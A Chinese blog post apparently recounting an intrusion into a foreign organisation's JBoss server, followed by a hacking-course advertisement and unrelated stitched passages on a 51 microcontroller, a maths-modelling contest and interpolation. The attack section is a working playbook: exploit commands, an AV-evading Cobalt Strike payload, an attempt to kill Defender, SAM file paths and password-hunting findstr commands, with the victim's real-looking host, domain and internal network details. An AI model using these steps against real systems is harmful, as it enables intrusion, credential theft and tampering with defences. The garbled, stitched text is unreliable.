内网横向免杀对抗渗透,从零基础到精通,收藏这篇就够了!

装备别搞丢!渗透测试工具箱大公开

  • Jexboss:漏洞挖掘界的“老中医”,专治各种不服的反序列化。
  • Kali Linux:渗透测试界的瑞士军刀,只有你想不到,没有它做不到。
  • CS 4.3:红队神器,团队协作,一键上线,妈妈再也不用担心我找不到队友。
  • Windows杀软在线查询(一二三):三管齐下,让杀软在你面前无所遁形。
  • Fscan:内网扫描界的“闪电侠”,速度快到没朋友。
  • 潮汐Shellcode免杀:免杀界的“小清新”,轻量级bypass,谁用谁知道。
  • LSTAR:CS插件界的“变形金刚”,功能强大到你尖叫。
  • CobaltStrike其他插件:CS的“后宫佳丽三千”,总有一款适合你。
  • PEASS-ng:权限提升界的“挖掘机”,扫遍全盘,不放过任何一个漏洞。
  • PrintSpoofer:提权界的“平头哥”,不服就干,生死看淡。

渗透,从“外”开始

1、为了提升内网渗透技能,让我们把目光投向海外站点。

2、发现某Jboss站点存在反序列化漏洞,但是,Jexboss竟然无法成功利用。难道是水逆?

python jexboss.py -u https://xx.xx.xx/

3、别慌,祭出“java反序列化终极测试工具 by 6哥”,一击命中,瞬间拿下!

4、执行whoami,发现只是个普通用户,这怎么能忍?

5、ipconfig走一波,摸清当前IP段,为后续的横向渗透做准备。

6、tasklist /svc,看看有没有“老朋友”杀软。

7、将进程信息复制到Windows杀软在线查询,果然有货!

8、Ping一下百度,看看能不能出网。Good!可以连通外网。

CS上线:躲猫猫大作战

1、既然有杀软,直接上传CS马肯定凉凉。这次我们选择潮汐shellcode免杀,体积小,上传速度快,简直是居家旅行必备。

2、CS生成C语言的shellcode,复制到剪贴板。

3、粘贴到潮汐免杀网站,生成exe,上传到目标机器,执行!

C:\usr\desarrollo\jboss-5.1.0.GA\server\sigAmeServer\deploy\ROOT.war\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide

4、CS成功“喜提”肉鸡一枚!

权限提升:是时候表演真正的技术了

搞事情之前,先收集情报

1、看看当前用户是谁,有什么特权。

whoami
whoami /priv

2、systeminfo,摸清系统版本和补丁信息,知己知彼,百战不殆。

Nombre de host:                            AMEPROWEBEGAD
Nombre del sistema operativo:              Microsoft Windows 10 Pro
Versi¢n del sistema operativo:             10.0.19044 N/D Compilaci¢n 19044
Fabricante del sistema operativo:          Microsoft Corporation
Configuraci¢n del sistema operativo:       Estaci¢n de trabajo miembro
Tipo de compilaci¢n del sistema operativo: Multiprocessor Free
Propiedad de:                              appzusr
Organizaci¢n registrada:                   
Id. del producto:                          00331-10000-00001-AA727
Fecha de instalaci¢n original:             13/5/2022, 14:03:47
Tiempo de arranque del sistema:            1/2/2023, 16:50:29
Fabricante del sistema:                    VMware, Inc.
Modelo el sistema:                         VMware Virtual Platform
Tipo de sistema:                           x64-based PC
Procesador(es):                            2 Procesadores instalados.
                                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
                                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
Versi¢n del BIOS:                          Phoenix Technologies LTD 6.00, 12/11/2020
Directorio de Windows:                     C:Windows
Directorio de sistema:                     C:Windowssystem32
Dispositivo de arranque:                   DeviceHarddiskVolume1
Configuraci¢n regional del sistema:        ezs-mx;Espa¤ol (M‚xico)
Idioma de entrada:                         es-mx;Espa¤ol (M‚xico)
Zona horaria:                              (UTC-06:00) Guadalajara, Ciudad de M‚xico, Monterrey
Cantidad total de memoria f¡sica:          4.095 MB
Memoria f¡sica disponible:                 1.201 MB
Memoria virtual: tama¤o m ximo:            4.799 MB
Memoria virtual: disponible:               1.147 MB
Memoria virtual: en uso:                   3.652 MB
Ubicaci¢n(es) de archivo de paginaci¢n:    C:pagefile.sys
Dominio:                                   ame.local
Servidor de inicio de sesi¢n:              \AMEPROWEBEGAD
Revisi¢n(es):                              4 revisi¢n(es) instaladas.
                                           [01]: KB5004331
                                           [02]: KB5003791
                                           [03]: KB5006670
                                           [04]: KB5005699
Tarjeta(s) de red:                         1 Tarjetas de interfaz de red instaladas. z
                                          [01]: Intel(R) PRO/1000 MT Network Connection
                                                 Nombre de conexi¢n: Ethernet0
                                                 DHCP habilitado:    No
                                                 Direcciones IP
                                                 [01]: 172.16.2.100
                                                 [02]: fe80::591:ae09:eee1:888e
Requisitos Hyper-V:                        Se detect¢ un hipervisor. No se mostrar n las caracter¡sticas necesarias para Hyper-V.

3、netstat -ano,看看开了哪些“大门”,有没有什么可乘之机。

Conexiones activas

  Proto  Direcci¢n local          Direcci¢n remota        Estado           PID

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       600

  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4

  TCP    0.0.0.0:1090           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:1098           0.0.0.0:0              LISTENING       7600

  TCP z   0.0.0.0:1099           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1072

  TCP    0.0.0.0:3873           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4445           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4446           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4457           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4712           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4713           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       6652

  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4

  TCP    0.0.0.0:7070           0.0.0.0:0              LISTENING       3564

  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:8080           0.0.0.0:0    z          LISTENING       7600

  TCP    0.0.0.0:8083           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:46305          0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4

  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       832

  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       680

  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1416

  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1612

  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2452

  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       832

  TCP    0.0.0.0:49672          0.0.0.0:0              LISTENING       3404

  TCP    0.0.0.0:49704          0.0.0.0:0              LISTENING       820

  TCP    0.0.0.0:49708          0.0.0.0:0              LISTENING       3048

  TCP    0.0.0.0:51407          0.0.0.0:0              LISTENING       7600

  TCP    127z.0.0.1:5140         0.0.0.0:0              LISTENING       7172

  TCP    127.0.0.1:51411        0.0.0.0:0              LISTENING       7600

  TCP    172.16.2.100:139       0.0.0.0:0              LISTENING       4

  TCP    172.16.2.100:8080      172.16.12.34:42602     TIME_WAIT       0

  TCP    172.16.2.100:8080      172.16.12.34:42610     ESTABLISHED     7600

  TCP    172.16.2.100:8080      172.16.12.34:55672     TIME_WAIT       0

  TCP    172.16.2.100:8080      172.16.12.34:55686     TIME_WAIT       0

  TCP    172.16.2.100:49717     38.90.226.62:8883      ESTABLISHED     3576

  TCP    172.16.2.100:50848     172.16.2.100:51407     TIME_WAIT       0

  TCP    172.16.2.100:51413     172.16.2.190:1433      ESTABLISHED     7600

  TCP    172.16.2.100:51447     172.16.2.190:1433      ESTABLISHED     7600

  TCP    172.16.2.100:56063     172.16.2.11:2222       ESTABLISHED     3576

  TCP    172.16.2.100:56538     92.223.66.48:443       ESTABLISHED     3564

  TCP    [::]:135               [::]:0                 LISTENINzG       600

  TCP    [::]:445               [::]:0                 LISTENING       4

  TCP    [::]:1090              [::]:0                 LISTENING       7600

  TCP    [::]:1098              [::]:0                 LISTENING       7600

  TCP    [::]:1099              [::]:0                 LISTENING       7600

  TCP    [::]:3389              [::]:0                 LISTENING       1072

  TCP    [::]:3873              [::]:0                 LISTENING       7600

  TCP    [::]:4444              [::]:0                 LISTENING       7600

  TCP    [::]:4445              [::]:0                 LISTENING       7600

  TCP    [::]:4446              [::]:0                 LISTENING       7600

  TCP    [::]:4457              [::]:0                 LISTENING       7600

  TCP    [::]:4712              [::]:0                 LISTENING       7600

  TCP    [::]:4713              [::]:0                 LISTENING       7600

  TCP    [::]:5985              [::]:0                 LISTENING       4

  TCP    [::]:8009            z  [::]:0                 LISTENING       7600

  TCP    [::]:8080              [::]:0                 LISTENING       7600

  TCP    [::]:8083              [::]:0                 LISTENING       7600

  TCP    [::]:46305             [::]:0                 LISTENING       7600

  TCP    [::]:47001             [::]:0                 LISTENING       4

  TCP    [::]:49664             [::]:0                 LISTENING       832

  TCP    [::]:49665             [::]:0                 LISTENING       680

  TCP    [::]:49666             [::]:0                 LISTENING       1416

  TCP    [::]:49667             [::]:0                 LISTENING       1612

  TCP    [::]:49668             [::]:0                 LISTENING       2452

  TCP    [::]:49671             [::]:0                 LISTENING       832

  TCP    [::]:49672             [::]:0                 LISTENING       3404

  TCP    [::]:49704             [::]:0                 LISTENING       820

  TCP    [::]:49708             [::]:0                 LISTENING       30z48

  TCP    [::]:51407             [::]:0                 LISTENING       7600

  UDP    0.0.0.0:123            *:*                                    1268

  UDP    0.0.0.0:500            *:*                                    3040

  UDP    0.0.0.0:3389           *:*                                    1072

  UDP    0.0.0.0:4500           *:*                                    3040

  UDP    0.0.0.0:5050           *:*                                    6652

  UDP    0.0.0.0:5353           *:*                                    1432

  UDP    0.0.0.0:5355           *:*                                    1432

  UDP    0.0.0.0:50001          *:*                                    3564

  UDP    0.0.0.0:50007          *:*                                    1240

  UDP    0.0.0.0:56152          *:*                                    1240

  UDP    0.0.0.0:61593          *:*                                    1240

  UDP    0.0.0.0:64843          *:*                                    1240

  UDP    127.0.0.1:1900         *z:*                                    2876

  UDP    127.0.0.1:50434        *:*                                    832

  UDP    127.0.0.1:55588        *:*                                    2876

  UDP    127.0.0.1:65220        *:*                                    1868

  UDP    127.0.0.1:65222        *:*                                    2360

  UDP    172.16.2.100:137       *:*                                    4

  UDP    172.16.2.100:138       *:*                                    4

  UDP    172.16.2.100:1900      *:*                                    2876

  UDP    172.16.2.100:55587     *:*                                    2876

  UDP    [::]:123               *:*                                    1268

  UDP    [::]:500               *:*                                    3040

  UDP    [::]:3389              *:*                                    1072

  UDP    [::]:4500              *:*                                    3040

  UDP    [::]:5353              *:*                                    1432z

  UDP    [::]:5355              *:*                                    1432

  UDP    [::1]:1900             *:*                                    2876

  UDP    [::1]:55586            *:*                                    2876

  UDP    [fe80::591:ae09:eee1:888e%13]:1900  *:*                                    2876

  UDP    [fe80::591:ae09:eee1:888e%13]:55585  *:*                                    2876

4、shell ipconfig /all,再确认一下网卡信息。

Configuración IP de Windows

   Nombre de host. . . . . . . . . : AMEPROWEBEGAD

   Sufijo DNS principal  . . . . . : ame.local

   Tipo de nodo. . . . . . . . . . : híbrido

   Enrutamiento IP habilitado. . : no

   Proxy WINS habilitado . . . . . : no

   Lista de búsqueda de sufijos DNS: ame.local

Adaptador de Ethernet Ethernet0:

   Sufijo DNS específico para la conexión. . :

   Descripción . . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection

   Dirección física. . . . . . . . . . . . . : 00-50-56-B2-9D-FE

   DHCP habilitado . . . . . . . . . . . . . : no

   Configuración automática habilitada . . . : sí

   Vínculo: dirección IPv6 local. . . : fe80::591:ae09:eee1:888e%13(Preferido)

   Dirección IPv4. . . . . . . . . . . . . . : 172.16.2.100(Preferido)

   Máscara de subred . . . . . . . . . . . . : 255.255.255.0

   Puerta de enlace predeterminada . . . . . : 172.16.2.254

   IAID DHCPv6 . . . . . . . . . . . . . . . : 100683862

   DUID de cliente DHCPv6. . . . . . . . . . : 00-01-00-01-2A-10-71-A7-00-50-56-B2-9D-FE

   Servidores DNS. . . . . . . . . . . . . . : 172.16.2.20

                                       10.0.0.1

   NetBIOS sobre TCP/IP. . . . . . . . . . . : habilitado

5、shell arp -a,路由表信息也安排上。

Interfaz: 172.16.2.100 --- 0xd

  Dirección de Internet          Dirección física      Tipo

  172.16.2.11           00-50-56-b2-ac-66     dinámico

  172.16.2.20           00-50-56-b2-d2-30     dinámico

  172.16.2.150          00-90-a9-d6-91-01     dinámico

  172.16.2.190          00-50-56-b2-99-b0     dinámico

  172.16.2.254          00-00-5e-00-01-02     dinámico

  172.16.2.255          ff-ff-ff-ff-ff-ff     estático

  224.0.0.22            01-00-5e-00-00-16     estático

  224.0.0.251           01-00-5e-00-00-fb     estático

  224.0.0.252           01-00-5e-00-00-fc     estático

  239.255.255.250       01-00-5e-7f-ff-fa     estático

6、shell systeminfo,确认一下,果然存在域环境。

插件提权?不存在的!

1、先试试CS自带的插件提权,结果,卒!不仅没提权成功,CS连接还断了。看来杀软也不是吃素的。

关掉杀软?想多了!

1、既然硬的不行,那就来软的,尝试关闭杀软。通过进程列表发现杀软进程名是MsMpEng.exe

tskill MsMpEng
tasklist /svc

2、然而,理想很丰满,现实很骨感。杀软竟然会自动重启,简直是打不死的小强。

Windows-Exploit-Suggester:漏洞在哪儿?

1、安装更新脚本,这个步骤不能少。

python2 -m pip install --user xlrd==1.1.0
python2 windows-exploit-suggester.py --update

2、把systeminfo的内容保存到systeminfo.txt,然后开始扫描。

python2 ./windows-exploit-suggester.py --database 2023-02-06-mssb.xls --systeminfo systeminfo.txt

3、找到几个EXP,上传测试,结果,全部阵亡。

PEASS-ng:你瞅啥?

1、上传到目标机器,结果直接被杀软干掉。看来,想在杀软眼皮底下搞事情,还是太难了。

winPEASany.exe log=result.txt

查看SAM密码文件:想peach?

1、SAM密码文件位置如下:

system文件位置:C:WindowsSystem32configSYSTEM
sam文件位置:C:WindowsSystem32configSAM

2、但是,权限不够,根本无法查看。

windows敏感文件:大海捞针

1、查看最近打开的文档,看看有没有意外收获。

dir %APPDATA%MicrosoftWindowsRecent

2、递归搜索后面的文件,看看有没有password字段。

findstr /si password  config.*  *.ini *.txt *.properties

3、递归查找当前目录包含conf的文件。

dir /a /s /b "*conf*" > 1.txt

4、递归查找目录下的txt中的password字段。

findstr /s /i /c:"Password" 目录*.txt

5、递归查找目录下的敏感

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************

标题“51单片机通过MPU6050-DMP获取姿态角例程”解析 “51单片机通过MPU6050-DMP获取姿态角例程”是一个基于51系列单片机(一种常见的8位微控制器)的程序示例,用于读取MPU6050传感器的数据,并通过其内置的数字运动处理器(DMP)计算设备的姿态角(如倾斜角度、旋转角度等)。MPU6050是一款集成三轴加速度计和三轴陀螺仪的六自由度传感器,广泛应用于运动控制和姿态检测领域。该例程利用MPU6050的DMP功能,由DMP处理复杂的运动学算法,例如姿态融合,将加速度计和陀螺仪的数据进行整合,从而提供稳定且实时的姿态估计,减轻主控MCU的计算负担。最终,姿态角数据通过LCD1602显示屏以字符形式可视化展示,为用户提供直观的反馈。 从标签“51单片机 6050”可知,该项目主要涉及51单片机和MPU6050传感器这两个关键硬件组件。51单片机基于8051内核,因编程简单、成本低而被广泛应用;MPU6050作为惯性测量单元(IMU),可测量设备的线性和角速度。文件名“51-DMP-NET”可能表示这是一个与51单片机及DMP相关的网络资源或代码库,其中可能包含C语言等适合51单片机的编程语言的源代码、配置文件、用户手册、示例程序,以及可能的调试工具或IDE项目文件。 实现该项目需以下步骤:首先是硬件连接,将51单片机与MPU6050通过I2C接口正确连接,同时将LCD1602连接到51单片机的串行数据线和控制线上;接着是初始化设置,配置51单片机的I/O端口,初始化I2C通信协议,设置MPU6050的工作模式和数据输出速率;然后是DMP配置,启用MPU6050的DMP功能,加载预编译的DMP固件,并设置DMP输出数据的中断;之后是数据读取,通过中断服务程序从DMP接收姿态角数据,数据通常以四元数或欧拉角形式呈现;再接着是数据显示,将姿态角数据转换为可读的度数格
MathorCup高校数学建模挑战赛是一项旨在提升学生数学应用、创新和团队协作能力的年度竞赛。参赛团队需在规定时间内解决实际问题,运用数学建模方法进行分析并提出解决方案。2021年第十一届比赛的D题就是一个典型例子。 MATLAB是解决这类问题的常用工具。它是一款强大的数值计算和编程软件,广泛应用于数学建模、数据分析和科学计算。MATLAB拥有丰富的函数库,涵盖线性代数、统计分析、优化算法、信号处理等多种数学操作,方便参赛者构建模型和实现算法。 在提供的文件列表中,有几个关键文件: d题论文(1).docx:这可能是参赛队伍对D题的解答报告,详细记录了他们对问题的理解、建模过程、求解方法和结果分析。 D_1.m、ratio.m、importfile.m、Untitled.m、changf.m、pailiezuhe.m、huitu.m:这些是MATLAB源代码文件,每个文件可能对应一个特定的计算步骤或功能。例如: D_1.m 可能是主要的建模代码; ratio.m 可能用于计算某种比例或比率; importfile.m 可能用于导入数据; Untitled.m 可能是未命名的脚本,包含临时或测试代码; changf.m 可能涉及函数变换; pailiezuhe.m 可能与矩阵的排列组合相关; huitu.m 可能用于绘制回路图或流程图。 matlab111.mat:这是一个MATLAB数据文件,存储了变量或矩阵等数据,可能用于后续计算或分析。 D-date.mat:这个文件可能包含与D题相关的特定日期数据,或是模拟过程中用到的时间序列数据。 从这些文件可以推测,参赛队伍可能利用MATLAB完成了数据预处理、模型构建、数值模拟和结果可视化等一系列工作。然而,具体的建模细节和解决方案需要查看解压后的文件内容才能深入了解。 在数学建模过程中,团队需深入理解问题本质,选择合适的数学模
以下是关于三种绘制云图或等高线图算法的介绍: 一、点距离反比插值算法 该算法的核心思想是基于已知数据点的值,计算未知点的值。它认为未知点的值与周围已知点的值相关,且这种关系与距离呈反比。即距离未知点越近的已知点,对未知点值的影响越大。具体来说,先确定未知点周围若干个已知数据点,计算这些已知点到未知点的距离,然后根据距离的倒数对已知点的值进行加权求和,最终得到未知点的值。这种方法简单直观,适用于数据点分布相对均匀的情况,能较好地反映数据在空间上的变化趋势。 二、双线性插值算法 这种算法主要用于处理二维数据的插值问题。它首先将数据点所在的区域划分为一个个小的矩形单元。当需要计算某个未知点的值时,先找到该点所在的矩形单元,然后利用矩形单元四个顶点的已知值进行插值计算。具体过程是先在矩形单元的一对对边上分别进行线性插值,得到两个中间值,再对这两个中间值进行线性插值,最终得到未知点的值。双线性插值能够较为平滑地过渡数据值,特别适合处理图像缩放、地理数据等二维场景中的插值问题,能有效避免插值结果出现明显的突变。 三、面距离反比 + 双线性插值算法 这是一种结合了面距离反比和双线性插值两种方法的算法。它既考虑了数据点所在平面区域对未知点值的影响,又利用了双线性插值的平滑特性。在计算未知点的值时,先根据面距离反比的思想,确定与未知点所在平面区域相关的已知数据点集合,这些点对该平面区域的值有较大影响。然后在这些已知点构成的区域内,采用双线性插值的方法进行进一步的插值计算。这种方法综合了两种算法的优点,既能够较好地反映数据在空间上的整体分布情况,又能保证插值结果的平滑性,适用于对插值精度和数据平滑性要求较高的复杂场景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值